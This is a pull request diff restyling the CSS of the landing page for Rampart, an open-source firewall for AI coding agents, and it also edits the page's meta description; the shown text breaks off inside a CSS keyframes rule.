### PR TITLE
docs: polish rampart landing page

### DIFF
--- a/docs/index.html
+++ b/docs/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>AI Agent Firewall for Claude Code and Codex | Rampart</title>
-    <meta name="description" content="Open-source AI agent firewall for Claude Code, Codex, Cline, OpenClaw, and MCP. Enforce YAML policies before commands run — 8µs overhead, no cloud.">
+    <meta name="description" content="Open-source AI agent firewall for Claude Code, Codex, Cline, OpenClaw, and MCP. Enforce YAML policies before commands run — local-first, no cloud dependency.">
     <link rel="canonical" href="https://rampart.sh/">
     <meta property="og:type" content="website">
     <meta property="og:title" content="AI Agent Firewall for Claude Code and Codex | Rampart">
@@ -49,692 +49,1018 @@
     <style>
         :root {
             --bg: #09090b;
-            --surface: #18181b;
-            --surface-2: #1e1e22;
-            --border: #27272a;
-            --border-light: #3f3f46;
+            --surface: rgba(20, 20, 24, 0.6);
+            --surface-strong: rgba(22, 22, 28, 0.84);
+            --surface-soft: rgba(255,255,255,0.03);
+            --border: rgba(255,255,255,0.08);
+            --border-strong: rgba(255,255,255,0.14);
             --text: #a1a1aa;
-            --text-bright: #e4e4e7;
-            --heading: #e4e4e7;
+            --text-bright: #f3f4f6;
+            --heading: #fafafa;
             --accent: #FF6392;
-            --accent-dim: #cc4f75;
-            --accent-bg: rgba(255, 99, 146, 0.1);
-            --accent-border: rgba(255, 99, 146, 0.2);
-            --text-dim: #71717a;
+            --accent-dim: #cf5077;
+            --accent-bg: rgba(255, 99, 146, 0.12);
+            --accent-border: rgba(255, 99, 146, 0.22);
+            --text-dim: #6b7280;
             --green: #22c55e;
             --red: #ef4444;
             --orange: #f59e0b;
             --cyan: #06b6d4;
             --mono: 'SF Mono', 'Fira Code', 'Cascadia Code', 'Consolas', monospace;
+            --shadow: 0 30px 90px rgba(0,0,0,0.28);
         }
 
-        * { margin: 0; padding: 0; box-sizing: border-box; }
-
+        * { box-sizing: border-box; margin: 0; padding: 0; }
+        html { scroll-behavior: smooth; }
         body {
             font-family: 'Archivo', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
             background: var(--bg);
             color: var(--text);
-            line-height: 1.7;
+            line-height: 1.65;
             font-size: 16px;
             -webkit-font-smoothing: antialiased;
+            position: relative;
+            overflow-x: hidden;
         }
-
+        body::before,
+        body::after {
+            content: "";
+            position: fixed;
+            inset: 0;
+            pointer-events: none;
+            z-index: -2;
+        }
+        body::before {
+            background:
+                radial-gradient(circle at 18% 12%, rgba(255,99,146,0.16), transparent 34%),
+                radial-gradient(circle at 82% 18%, rgba(6,182,212,0.10), transparent 28%),
+                radial-gradient(circle at 55% 72%, rgba(255,99,146,0.08), transparent 36%),
+                linear-gradient(180deg, rgba(255,255,255,0.02), transparent 22%);
+            transform: translateY(calc(var(--scroll, 0) * -0.04px));
+        }
+        body::after {
+            background-image:
+                linear-gradient(rgba(255,255,255,0.03) 1px, transparent 1px),
+                linear-gradient(90deg, rgba(255,255,255,0.03) 1px, transparent 1px);
+            background-size: 44px 44px;
+            mask-image: radial-gradient(circle at center, black 30%, transparent 82%);
+            opacity: 0.25;
+            z-index: -3;
+        }
+        a { color: inherit; }
         code {
             font-family: var(--mono);
             font-size: 0.85em;
-            background: var(--surface-2);
+            background: rgba(255,255,255,0.05);
+            border: 1px solid rgba(255,255,255,0.08);
             padding: 2px 6px;
-            border-radius: 4px;
-            border: 1px solid var(--border);
+            border-radius: 6px;
         }
-        .container { max-width: 1080px; margin: 0 auto; padding: 0 24px; }
-        .container-narrow { max-width: 780px; margin: 0 auto; padding: 0 24px; }
 
-        /* ── Nav ── */
+        .container { max-width: 1160px; margin: 0 auto; padding: 0 24px; }
+        .container-narrow { max-width: 860px; margin: 0 auto; padding: 0 24px; }
+        .eyebrow {
+            display: inline-flex;
+            align-items: center;
+            gap: 10px;
+            padding: 7px 14px;
+            border-radius: 999px;
+            border: 1px solid var(--accent-border);
+            background: rgba(255,255,255,0.03);
+            color: var(--text-bright);
+            font-size: 0.76rem;
+            letter-spacing: 0.08em;
+            text-transform: uppercase;
+        }
+        .eyebrow-dot {
+            width: 7px;
+            height: 7px;
+            border-radius: 50%;
+            background: var(--accent);
+            box-shadow: 0 0 18px rgba(255,99,146,0.7);
+        }
+        .section {
+            position: relative;
+            padding: 110px 0;
+        }
+        .section.tight { padding-top: 78px; padding-bottom: 78px; }
+        .section-label {
+            font-size: 0.78rem;
+            font-weight: 700;
+            text-transform: uppercase;
+            letter-spacing: 0.11em;
+            color: var(--accent);
+            margin-bottom: 12px;
+        }
+        .section-title {
+            color: var(--heading);
+            font-size: clamp(2.1rem, 4vw, 3.4rem);
+            line-height: 1.02;
+            letter-spacing: -0.04em;
+            margin-bottom: 16px;
+        }
+        .section-desc {
+            color: var(--text);
+            font-size: 1.04rem;
+            max-width: 660px;
+        }
+        .panel {
+            background: linear-gradient(180deg, rgba(255,255,255,0.045), rgba(255,255,255,0.02));
+            border: 1px solid var(--border);
+            backdrop-filter: blur(12px);
+            -webkit-backdrop-filter: blur(12px);
+            border-radius: 24px;
+            box-shadow: var(--shadow);
+        }
+        .interactive {
+            transition: transform 180ms ease, border-color 180ms ease, box-shadow 180ms ease, background 180ms ease;
+        }
+        .interactive:hover {
+            transform: translateY(-2px);
+            border-color: rgba(255,255,255,0.16);
+            box-shadow: 0 20px 60px rgba(0,0,0,0.22);
+        }
+
         nav {
-            padding: 20px 0;
-            border-bottom: 1px solid var(--border);
             position: sticky;
             top: 0;
-            background: rgba(9, 9, 11, 0.85);
-            -webkit-backdrop-filter: blur(12px);
-            backdrop-filter: blur(12px);
             z-index: 100;
+            padding: 18px 0;
+            background: rgba(9, 9, 11, 0.68);
+            backdrop-filter: blur(14px);
+            -webkit-backdrop-filter: blur(14px);
+            border-bottom: 1px solid rgba(255,255,255,0.06);
         }
         nav .inner {
-            max-width: 1080px;
+            max-width: 1160px;
             margin: 0 auto;
             padding: 0 24px;
             display: flex;
             align-items: center;
             justify-content: space-between;
         }
-        nav .logo {
-            font-family: 'Archivo', sans-serif;
-            font-size: 2rem;
-            font-weight: 300;
-            color: var(--heading);
-            text-decoration: none;
-            letter-spacing: -0.02em;
-            display: flex;
+        .logo {
+            display: inline-flex;
             align-items: center;
             gap: 10px;
-        }
-        nav .logo svg { flex-shrink: 0; }
-        nav .links { display: flex; gap: 24px; align-items: center; }
-        nav .links a {
-            color: var(--text);
+            color: var(--heading);
             text-decoration: none;
-            font-size: 0.875rem;
-            font-weight: 500;
-            transition: color 0.15s;
+            font-size: 1.95rem;
+            font-weight: 300;
+            letter-spacing: -0.03em;
         }
-        nav .links a:hover { color: var(--heading); }
-        nav .links .btn-nav {
-            background: var(--surface);
+        .nav-links {
+            display: flex;
+            align-items: center;
+            gap: 22px;
+        }
+        .nav-links a {
+            text-decoration: none;
+            color: var(--text);
+            font-size: 0.92rem;
+            transition: color 150ms ease;
+        }
+        .nav-links a:hover { color: var(--text-bright); }
+        .nav-btn {
+            display: inline-flex;
+            align-items: center;
+            gap: 8px;
+            padding: 9px 14px;
+            border-radius: 999px;
+            border: 1px solid var(--border);
+            background: rgba(255,255,255,0.03);
             color: var(--text-bright);
-            padding: 6px 16px;
-            border-radius: 6px;
             font-weight: 600;
-            border: 1px solid var(--border-light);
+            transition: transform 180ms ease, border-color 180ms ease, background 180ms ease;
         }
-        nav .links .btn-nav:hover { border-color: var(--text); color: var(--heading); }
+        .nav-btn:hover {
+            transform: translateY(-1px);
+            border-color: rgba(255,255,255,0.14);
+            background: rgba(255,255,255,0.05);
+        }
 
-        /* ── Hero ── */
         .hero {
-            padding: 82px 0 22px;
-            text-align: left;
-            position: relative;
-            overflow: hidden;
-            background:
-                radial-gradient(ellipse 760px 460px at 28% 20%, rgba(255, 99, 146, 0.12) 0%, transparent 68%),
-                linear-gradient(180deg, rgba(255,255,255,0.018), transparent 44%);
-        }
-        .hero::before {
-            content: "";
-            position: absolute;
-            inset: 0;
-            pointer-events: none;
-            background-image:
-                linear-gradient(rgba(255,255,255,0.025) 1px, transparent 1px),
-                linear-gradient(90deg, rgba(255,255,255,0.025) 1px, transparent 1px);
-            background-size: 42px 42px;
-            mask-image: radial-gradient(ellipse at 28% 18%, black 0%, transparent 65%);
+            padding: 88px 0 36px;
         }
         .hero-grid {
-            position: relative;
             display: grid;
-            grid-template-columns: minmax(0, 1fr) minmax(390px, 450px);
-            gap: clamp(24px, 3vw, 40px);
+            grid-template-columns: minmax(0, 1.02fr) minmax(360px, 430px);
+            gap: clamp(28px, 4vw, 54px);
             align-items: center;
         }
-        .hero .badges {
-            display: flex;
-            justify-content: flex-start;
-            gap: 12px;
-            margin-bottom: 28px;
-            flex-wrap: wrap;
-        }
-        .hero .badge {
-            display: inline-block;
-            font-size: 0.8rem;
-            font-weight: 500;
-            color: var(--green);
-            background: rgba(34, 197, 94, 0.1);
-            border: 1px solid rgba(34, 197, 94, 0.2);
-            padding: 4px 14px;
-            border-radius: 20px;
-        }
-        .hero .badge-neutral {
-            color: var(--text-bright);
-            background: rgba(255, 255, 255, 0.05);
-            border-color: var(--border-light);
-        }
         .hero h1 {
-            font-size: clamp(3rem, 6vw, 5.6rem);
-            font-weight: 800;
             color: var(--heading);
-            letter-spacing: -0.03em;
-            line-height: 0.96;
-            margin-bottom: 20px;
+            font-size: clamp(3.2rem, 7.2vw, 6rem);
+            letter-spacing: -0.055em;
+            line-height: 1;
+            margin: 20px 0 22px;
+            overflow: visible;
+            text-wrap: balance;
+            padding-right: 0.08em;
         }
         .hero h1 .accent {
-            background: linear-gradient(135deg, #d94e78, var(--accent));
+            display: inline-block;
+            padding-right: 0.06em;
+            background: linear-gradient(135deg, #ffc0d2 0%, var(--accent) 45%, #f34b7f 100%);
             -webkit-background-clip: text;
             -webkit-text-fill-color: transparent;
             background-clip: text;
         }
-        .hero .sub {
-            font-size: 1.15rem;
+        .hero-sub {
+            font-size: 1.14rem;
+            max-width: 35ch;
             color: var(--text);
-            max-width: 680px;
-            margin: 0 0 32px;
+            margin-bottom: 28px;
             line-height: 1.7;
         }
-        .hero-install {
+        .install-cluster {
+            display: flex;
+            flex-direction: column;
+            gap: 16px;
+            align-items: flex-start;
+        }
+        .install-inline {
             display: inline-flex;
             align-items: center;
             gap: 12px;
-            background: var(--surface);
+            padding: 15px 18px;
+            border-radius: 16px;
+            background: rgba(255,255,255,0.04);
             border: 1px solid var(--border);
-            border-radius: 10px;
-            padding: 14px 24px;
-            font-family: var(--mono);
-            font-size: 0.92rem;
             color: var(--text-bright);
-            margin-bottom: 28px;
+            font-family: var(--mono);
+            font-size: 0.93rem;
             cursor: pointer;
-            transition: border-color 0.15s;
-            white-space: nowrap;
+            transition: border-color 180ms ease, transform 180ms ease, background 180ms ease;
         }
-        .hero-install:hover { border-color: var(--accent-border); }
-        .hero-install .prompt { color: var(--accent); }
-
-        .hero-buttons {
+        .install-inline:hover {
+            transform: translateY(-1px);
+            border-color: var(--accent-border);
+            background: rgba(255,255,255,0.06);
+        }
+        .prompt { color: var(--accent); }
+        .copy-hint {
+            white-space: nowrap;
+            color: var(--text-dim);
+            font-size: 0.74rem;
+            font-family: 'Archivo', sans-serif;
+            padding: 4px 8px;
+            border: 1px solid rgba(255,255,255,0.06);
+            border-radius: 999px;
+        }
+        .hero-meta {
             display: flex;
-            gap: 20px;
-            justify-content: flex-start;
             flex-wrap: wrap;
+            gap: 14px;
+            color: var(--text-dim);
+            font-size: 0.86rem;
+        }
+        .hero-actions {
+            display: flex;
+            gap: 12px;
+            flex-wrap: wrap;
+            margin-top: 8px;
         }
         .btn {
             display: inline-flex;
             align-items: center;
             gap: 8px;
-            padding: 14px 32px;
-            border-radius: 8px;
+            padding: 14px 20px;
+            border-radius: 999px;
             text-decoration: none;
-            font-weight: 600;
-            font-size: 0.95rem;
-            transition: all 0.15s;
-            border: none;
-            cursor: pointer;
+            border: 1px solid transparent;
+            font-weight: 700;
+            transition: transform 180ms ease, border-color 180ms ease, background 180ms ease;
         }
-        .btn:focus { outline: 2px solid var(--accent); outline-offset: 2px; }
-        .btn-primary { background: var(--accent); color: #000; }
+        .btn:hover { transform: translateY(-1px); }
+        .btn-primary {
+            background: var(--accent);
+            color: #111;
+        }
         .btn-primary:hover { background: var(--accent-dim); }
         .btn-ghost {
-            background: transparent;
+            border-color: var(--border);
             color: var(--text-bright);
-            border: 1px solid var(--border-light);
+            background: rgba(255,255,255,0.03);
         }
-        .btn-ghost:hover { border-color: var(--text); }
-        .hero-proof {
-            display: flex;
-            flex-wrap: wrap;
-            gap: 10px;
-            margin-top: 26px;
-            color: var(--text-dim);
-            font-family: var(--mono);
-            font-size: 0.78rem;
-        }
-        .hero-proof span { border: 1px solid var(--border); background: rgba(255,255,255,0.025); padding: 6px 9px; border-radius: 6px; }
         .hero-card {
+            padding: 22px;
             position: relative;
-            border: 1px solid var(--border);
-            background: linear-gradient(180deg, rgba(30,30,34,0.92), rgba(24,24,27,0.96));
-            border-radius: 18px;
-            padding: 18px;
-            box-shadow: 0 28px 90px rgba(0,0,0,0.42), 0 0 0 1px rgba(255,99,146,0.04);
+            overflow: hidden;
         }
         .hero-card::before {
             content: "";
             position: absolute;
-            inset: -1px;
-            border-radius: 18px;
-            background: linear-gradient(135deg, rgba(255,99,146,0.28), transparent 38%, rgba(6,182,212,0.12));
-            z-index: -1;
+            inset: 0;
+            background: linear-gradient(180deg, rgba(255,99,146,0.08), transparent 45%);
+            pointer-events: none;
         }
-        .hero-card-top { display:flex; align-items:center; justify-content:space-between; margin-bottom: 16px; }
-        .hero-card-title { font-family: var(--mono); color: var(--text-bright); font-size: 0.82rem; }
-        .hero-card-live { font-family: var(--mono); color: var(--green); font-size: 0.72rem; border:1px solid rgba(34,197,94,0.22); background:rgba(34,197,94,0.08); padding:3px 8px; border-radius:999px; }
-        .hero-feed { display:flex; flex-direction:column; gap: 9px; }
-        .hero-feed-row { display:grid; grid-template-columns: 24px 58px 1fr; gap: 10px; align-items:baseline; font-family: var(--mono); font-size:0.82rem; color:var(--text); padding: 10px 11px; border:1px solid rgba(255,255,255,0.045); border-radius:9px; background:rgba(9,9,11,0.38); }
-        .hero-feed-row.allow .verdict { color: var(--green); }
-        .hero-feed-row.ask .verdict, .hero-feed-row.ask .cmd { color: var(--orange); }
-        .hero-feed-row.deny .verdict, .hero-feed-row.deny .cmd { color: var(--red); }
-        .hero-feed-row .tool { color: var(--text-dim); }
-        .hero-card-callout { margin-top: 16px; padding: 14px; border:1px solid var(--accent-border); background: var(--accent-bg); border-radius: 10px; color: var(--text-bright); font-size: 0.9rem; line-height: 1.5; }
-
-        /* ── Terminal ── */
-        .terminal-section { padding: 40px 0 120px; }
-        .policy-tab {
-            font-family: var(--mono);
-            font-size: 0.78rem;
-            padding: 6px 14px;
-            border-radius: 6px;
-            border: 1px solid var(--border);
-            background: transparent;
-            color: var(--text);
-            cursor: pointer;
-            transition: all 0.15s;
-        }
-        .policy-tab:hover { border-color: var(--accent-border); color: var(--text-bright); }
-        .policy-tab.active { background: var(--accent); color: #000; border-color: var(--accent); font-weight: 600; }
-        .terminal {
-            background: #0c1117;
-            border: 1px solid #21262d;
-            border-radius: 12px;
-            overflow: hidden;
-            max-width: 860px;
-            margin: 0 auto;
-        }
-        .terminal-bar {
-            padding: 12px 16px;
-            background: #161b22;
-            border-bottom: 1px solid #21262d;
-            display: flex;
-            align-items: center;
-            gap: 8px;
-        }
-        .terminal-dot { width: 12px; height: 12px; border-radius: 50%; }
-        .terminal-dot:nth-child(1) { background: #ff5f57; }
-        .terminal-dot:nth-child(2) { background: #febc2e; }
-        .terminal-dot:nth-child(3) { background: #28c840; }
-        .terminal-title {
-            flex: 1;
-            text-align: center;
-            font-size: 0.8rem;
-            color: #8b949e;
-            font-family: var(--mono);
-        }
-        .terminal-body {
-            padding: 24px 28px;
-            font-family: var(--mono);
-            font-size: 0.82rem;
-            line-height: 1.7;
-        }
-        .terminal-header {
-            color: #8b949e;
-            border-bottom: 1px solid #21262d;
-            padding-bottom: 12px;
-            margin-bottom: 12px;
-        }
-        .watch-row {
-            display: grid;
-            grid-template-columns: 20px 70px 42px 1fr auto;
-            gap: 8px;
-            align-items: baseline;
-            padding: 5px 0;
-            opacity: 0;
-            animation: fadeInRow 0.4s ease forwards;
-        }
-        .watch-icon { text-align: center; }
-        .watch-time { color: #484f58; }
-        .watch-tool { color: #8b949e; }
-        .watch-cmd { color: #c9d1d9; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; min-width: 0; }
-        .watch-policy { color: #484f58; font-size: 0.75rem; }
-        @keyframes fadeInRow {
-            0% { opacity: 0; transform: translateY(4px); }
-            100% { opacity: 1; transform: translateY(0); }
-        }
-        /* Rows stay hidden until .animate class is added via IntersectionObserver */
-        .watch-rows.animate > :nth-child(1) { animation-delay: 0.3s; }
-        .watch-rows.animate > :nth-child(2) { animation-delay: 1.0s; }
-        .watch-rows.animate > :nth-child(3) { animation-delay: 1.6s; }
-        .watch-rows.animate > :nth-child(4) { animation-delay: 2.1s; }
-        .watch-rows.animate > :nth-child(5) { animation-delay: 2.5s; }
-        .watch-rows.animate > :nth-child(6) { animation-delay: 3.4s; }
-        .watch-rows.animate > :nth-child(7) { animation-delay: 4.0s; }
-        .watch-rows.animate > :nth-child(8) { animation-delay: 5.0s; }
-        .watch-allow .watch-icon { color: var(--green); }
-        .watch-deny .watch-icon { color: var(--red); }
-        .watch-deny .watch-cmd { color: var(--red); }
-        .watch-ask .watch-icon { color: var(--orange); }
-        .watch-ask .watch-cmd { color: var(--orange); }
-        .terminal-footer {
-            border-top: 1px solid #21262d;
-            padding-top: 12px;
-            margin-top: 12px;
-            color: #484f58;
-            font-size: 0.78rem;
-        }
-
-        /* ── Threat ── */
-        .threat { padding: 72px 0; border-top: 1px solid var(--border); }
-        .threat-grid { display: grid; grid-template-columns: 1fr; gap: 26px; align-items: start; margin-top: 28px; }
-        .threat-card { max-width: 820px; background: rgba(239,68,68,0.055); border: 1px solid rgba(239,68,68,0.16); border-radius: 10px; padding: 18px 20px; font-family: var(--mono); color: var(--red); font-size: 0.86rem; overflow-x: auto; }
-        .threat-card div + div { margin-top: 10px; }
-        .threat-note { color: var(--text-dim); font-size: 0.92rem; margin-top: 16px; }
-        .platform-grid { display: grid; grid-template-columns: repeat(3, 1fr); gap: 14px; margin-top: 28px; }
-        .platform-card { background: var(--surface); border: 1px solid var(--border); border-radius: 10px; padding: 18px; }
-        .platform-card h3 { color: var(--heading); font-size: 0.95rem; margin-bottom: 8px; }
-        .platform-card p { color: var(--text); font-size: 0.88rem; line-height: 1.6; }
-
-        /* ── Positioning ── */
-        .positioning {
-            padding: 80px 0;
-            border-top: 1px solid var(--border);
-        }
-        .section-label {
-            font-size: 0.8rem;
-            font-weight: 600;
-            text-transform: uppercase;
-            letter-spacing: 0.1em;
-            color: var(--accent);
-            margin-bottom: 12px;
-        }
-        .section-title {
-            font-size: 2rem;
-            font-weight: 700;
-            color: var(--heading);
-            letter-spacing: -0.02em;
-            margin-bottom: 16px;
-        }
-        .section-desc {
-            color: var(--text);
-            font-size: 1.05rem;
-            max-width: 560px;
-            margin-bottom: 48px;
-            line-height: 1.7;
-        }
-        .pos-grid {
-            display: grid;
-            grid-template-columns: 1fr 1fr;
-            gap: 24px;
-            max-width: 780px;
-        }
-        .pos-card {
-            background: var(--surface);
-            border: 1px solid var(--border);
-            border-radius: 12px;
-            padding: 36px;
-        }
-        .pos-card.negative { opacity: 0.6; }
-        .pos-card.positive { border-color: var(--accent-border); }
-        .pos-card .label {
-            font-size: 0.75rem;
-            font-weight: 600;
-            text-transform: uppercase;
-            letter-spacing: 0.1em;
-            margin-bottom: 12px;
-        }
-        .pos-card.negative .label { color: var(--text); }
-        .pos-card.positive .label { color: var(--accent); }
-        .pos-card h3 {
-            font-size: 1.1rem;
-            font-weight: 700;
-            color: var(--heading);
-            margin-bottom: 8px;
-        }
-        .pos-card p {
-            font-size: 0.9rem;
-            color: var(--text);
-            line-height: 1.6;
-        }
-        .pos-card pre {
-            background: var(--bg);
-            border: 1px solid var(--border);
-            border-radius: 6px;
-            padding: 10px 14px;
-            font-family: var(--mono);
-            font-size: 0.82rem;
-            color: var(--text);
-            margin-top: 16px;
-            overflow-x: auto;
-        }
-        .pos-card.positive pre { color: var(--accent); }
-
-        /* ── Features ── */
-        .features {
-            padding: 80px 0;
-            border-top: 1px solid var(--border);
-        }
-        .feature-grid {
-            display: grid;
-            grid-template-columns: repeat(3, 1fr);
-            gap: 20px;
-            max-width: 960px;
-        }
-        .feature-card {
-            background: var(--surface);
-            border: 1px solid var(--border);
-            border-radius: 12px;
-            padding: 28px;
-            min-height: 200px;
-            transition: border-color 0.2s;
-        }
-        .feature-card:hover { border-color: var(--border-light); }
-        .feature-icon {
-            width: 40px; height: 40px;
-            display: flex;
-            align-items: center;
-            justify-content: center;
-            border-radius: 10px;
-            background: rgba(255, 255, 255, 0.05);
-            border: 1px solid var(--border);
-            font-size: 1.1rem;
-            margin-bottom: 16px;
-        }
-        .feature-card h3 {
-            font-size: 1.15rem;
-            font-weight: 600;
-            color: var(--heading);
-            margin-bottom: 8px;
-        }
-        .feature-card p {
-            font-size: 0.95rem;
-            color: var(--text);
-            line-height: 1.6;
-        }
-        .feature-card pre {
-            background: var(--bg);
-            border: 1px solid var(--border);
-            border-radius: 6px;
-            padding: 8px 12px;
-            font-family: var(--mono);
-            font-size: 0.8rem;
-            color: var(--accent);
-            margin-top: 12px;
-            overflow-x: auto;
-        }
-        .feature-stat {
-            display: inline-block;
-            font-family: var(--mono);
-            font-size: 0.8rem;
-            color: var(--accent);
-            background: var(--accent-bg);
-            padding: 2px 8px;
-            border-radius: 4px;
-            margin-top: 8px;
-        }
-        .feature-grid--five { grid-template-columns: repeat(6, 1fr); }
-        .feature-grid--five .feature-card:nth-child(1),
-        .feature-grid--five .feature-card:nth-child(2),
-        .feature-grid--five .feature-card:nth-child(3) { grid-column: span 2; }
-        .feature-grid--five .feature-card:nth-child(4),
-        .feature-grid--five .feature-card:nth-child(5) { grid-column: span 3; }
-
-        .mechanics { padding: 90px 0; border-top: 1px solid var(--border); }
-        .mechanics-grid { display:grid; grid-template-columns: 0.9fr 1.1fr; gap: 34px; align-items:start; }
-        .flow-panel { background: var(--surface); border:1px solid var(--border); border-radius:16px; overflow:hidden; box-shadow:0 24px 80px rgba(0,0,0,0.24); }
-        .flow-row { display:grid; grid-template-columns: 92px 1fr auto; gap:16px; align-items:center; padding:18px 20px; border-bottom:1px solid var(--border); }
-        .flow-row:last-child { border-bottom:0; }
-        .flow-label { font-family:var(--mono); font-size:0.72rem; color:var(--accent); letter-spacing:0.08em; text-transform:uppercase; }
-        .flow-main { color:var(--heading); font-weight:700; }
-        .flow-sub { display:block; color:var(--text); font-size:0.88rem; font-weight:400; margin-top:3px; }
-        .flow-decision { font-family:var(--mono); font-size:0.72rem; color:var(--text-bright); border:1px solid var(--border-light); border-radius:999px; padding:4px 8px; white-space:nowrap; }
-        .flow-decision.ask { color:var(--orange); border-color:rgba(245,158,11,0.28); }
-        .flow-decision.deny { color:var(--red); border-color:rgba(239,68,68,0.28); }
-        .flow-decision.allow { color:var(--green); border-color:rgba(34,197,94,0.28); }
-
-        .example-grid { display:grid; grid-template-columns: repeat(3,1fr); gap:14px; margin-top:28px; }
-        .example-card { background:var(--surface); border:1px solid var(--border); border-radius:12px; padding:18px; }
-        .example-kicker { font-family:var(--mono); color:var(--accent); font-size:0.72rem; letter-spacing:0.08em; text-transform:uppercase; margin-bottom:10px; }
-        .example-card h3 { color:var(--heading); font-size:1rem; margin-bottom:8px; }
-        .example-card p { color:var(--text); font-size:0.9rem; line-height:1.6; }
-
-        .response-section { padding: 90px 0; border-top:1px solid var(--border); }
-        .response-layout { display:grid; grid-template-columns: 0.95fr 1.05fr; gap:32px; align-items:center; }
-        .response-visual { background:var(--surface); border:1px solid var(--border); border-radius:16px; padding:18px; }
-        .response-step { display:flex; gap:14px; align-items:flex-start; padding:14px 0; border-bottom:1px solid var(--border); }
-        .response-step:last-child { border-bottom:0; }
-        .response-num { font-family:var(--mono); color:var(--accent); border:1px solid var(--accent-border); background:var(--accent-bg); border-radius:6px; min-width:30px; height:30px; display:flex; align-items:center; justify-content:center; font-size:0.76rem; }
-        .response-step strong { display:block; color:var(--heading); margin-bottom:4px; }
-        .response-step span { color:var(--text); font-size:0.9rem; }
-
-        .integrations-section { padding:90px 0; border-top:1px solid var(--border); }
-        .integration-table { margin-top:30px; border:1px solid var(--border); border-radius:14px; overflow:hidden; background:var(--surface); }
-        .integration-row { display:grid; grid-template-columns: 1.05fr 1.45fr 1.05fr 0.65fr; gap:16px; align-items:center; padding:16px 20px; border-bottom:1px solid var(--border); }
-        .integration-row:last-child { border-bottom:0; }
-        .integration-row.header { background:var(--surface-2); color:var(--text-dim); font-family:var(--mono); font-size:0.72rem; text-transform:uppercase; letter-spacing:0.08em; }
-        .integration-agent { color:var(--heading); font-weight:700; }
-        .integration-code { font-family:var(--mono); color:var(--text-bright); font-size:0.82rem; white-space:nowrap; overflow:hidden; text-overflow:ellipsis; }
-        .integration-path, .integration-status { color:var(--text); font-size:0.88rem; }
-        .integration-status { color:var(--green); font-family:var(--mono); }
-
-        .ecosystem-section { padding:80px 0; border-top:1px solid var(--border); }
-        .ecosystem-card { display:grid; grid-template-columns: 1fr 1fr; gap:1px; background:var(--border); border:1px solid var(--border); border-radius:16px; overflow:hidden; max-width:900px; }
-        .ecosystem-half { background:var(--surface); padding:28px; }
-        .ecosystem-half h3 { color:var(--heading); font-size:1.35rem; margin-bottom:8px; }
-        .ecosystem-half p { color:var(--text); font-size:0.95rem; line-height:1.65; }
-        .ecosystem-line { margin-top:24px; color:var(--accent); font-family:var(--mono); }
-
-        .stats-band { padding: 34px 0; border-top: 1px solid var(--border); border-bottom: 1px solid var(--border); }
-        .stats-row { display: grid; grid-template-columns: repeat(5, 1fr); gap: 1px; background: var(--border); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; }
-        .stat-card { background: var(--surface); padding: 22px 18px; text-align: center; }
-        .stat-num { display:block; color: var(--heading); font-size: clamp(1.8rem, 4vw, 2.5rem); line-height: 1; font-weight: 800; letter-spacing: -0.03em; }
-        .stat-card:first-child .stat-num { color: var(--accent); }
-        .stat-label { display:block; color: var(--text-dim); font-family: var(--mono); font-size: 0.76rem; margin-top: 8px; }
-
-        .yaml-section { padding: 80px 0; border-top: 1px solid var(--border); }
-        .yaml-layout { display:grid; grid-template-columns: 0.85fr 1.15fr; gap: 32px; align-items:start; }
-        .yaml-block { background: var(--surface); border: 1px solid var(--border); border-radius: 12px; overflow:hidden; box-shadow: 0 24px 80px rgba(0,0,0,0.25); }
-        .yaml-bar { display:flex; align-items:center; gap:8px; padding: 10px 14px; background: var(--surface-2); border-bottom:1px solid var(--border); }
-        .yaml-dot { width:10px; height:10px; border-radius:50%; background: var(--border-light); }
-        .yaml-dot:nth-child(1) { background:#ff5f57; } .yaml-dot:nth-child(2) { background:#febc2e; } .yaml-dot:nth-child(3) { background:#28c840; }
-        .yaml-title { margin-left:6px; color: var(--text-dim); font-family: var(--mono); font-size:0.76rem; }
-        .yaml-block pre { margin:0; padding: 18px 20px; overflow:auto; background: var(--surface); border:0; color: var(--text); font-size:0.82rem; line-height:1.65; }
-        .yaml-k { color: var(--cyan); } .yaml-s { color: var(--green); } .yaml-a { color: var(--accent); } .yaml-c { color: var(--text-dim); }
-
-        .principles-section { padding: 58px 0; border-top: 1px solid var(--border); }
-        .principles-card { max-width: 900px; border: 1px solid var(--border); border-radius: 14px; padding: 22px 24px; background: rgba(24,24,27,0.58); }
-        .principles-line { color: var(--text-bright); font-size: 1.02rem; line-height: 1.65; }
-        .principles-line strong { color: var(--heading); }
-        .principles-meta { color: var(--text-dim); margin-top: 10px; font-size: 0.84rem; }
-
-        /* ── Compatibility ── */
-        .compat {
-            padding: 80px 0;
-            border-top: 1px solid var(--border);
-        }
-        .agent-grid {
-            display: grid;
-            grid-template-columns: repeat(auto-fill, minmax(180px, 1fr));
-            gap: 12px;
-        }
-        .agent-chip {
-            display: flex;
-            align-items: center;
-            gap: 10px;
-            background: var(--surface);
-            border: 1px solid var(--border);
-            border-radius: 8px;
-            padding: 14px 16px;
-            font-size: 0.9rem;
-            color: var(--text-bright);
-            font-weight: 500;
-        }
-        .agent-chip .dot {
-            width: 8px; height: 8px;
-            border-radius: 50%;
-            background: var(--text-dim);
-            flex-shrink: 0;
-        }
-        .agent-chip--native .dot {
-            background: var(--accent);
-        }
-
-        /* ── Install ── */
-        .install {
-            padding: 80px 0;
-            border-top: 1px solid var(--border);
-            text-align: center;
-        }
-        .install .section-title { margin-bottom: 12px; }
-        .install .sub { color: var(--text); margin-bottom: 32px; }
-
-        .install-cmd {
-            background: var(--surface);
-            border: 1px solid var(--border);
-            border-radius: 10px;
-            padding: 16px 24px;
-            font-family: var(--mono);
-            font-size: 0.9rem;
-            color: var(--text-bright);
-            cursor: pointer;
-            transition: border-color 0.15s;
+        .hero-card-bar {
+            position: relative;
             display: flex;
             align-items: center;
             justify-content: space-between;
-            gap: 16px;
+            margin-bottom: 18px;
+            font-family: var(--mono);
+            font-size: 0.78rem;
         }
-        .install-cmd:hover { border-color: var(--accent-border); }
-        .install-copy-hint {
-            font-size: 0.7rem;
+        .live-pill {
+            color: var(--green);
+            border: 1px solid rgba(34,197,94,0.2);
+            border-radius: 999px;
+            padding: 5px 10px;
+            background: rgba(34,197,94,0.08);
+            animation: pulse 2.2s ease-in-out infinite;
+        }
+        @keyframes pulse {
+            0%,100% { box-shadow: 0 0 0 rgba(34,197,94,0); }
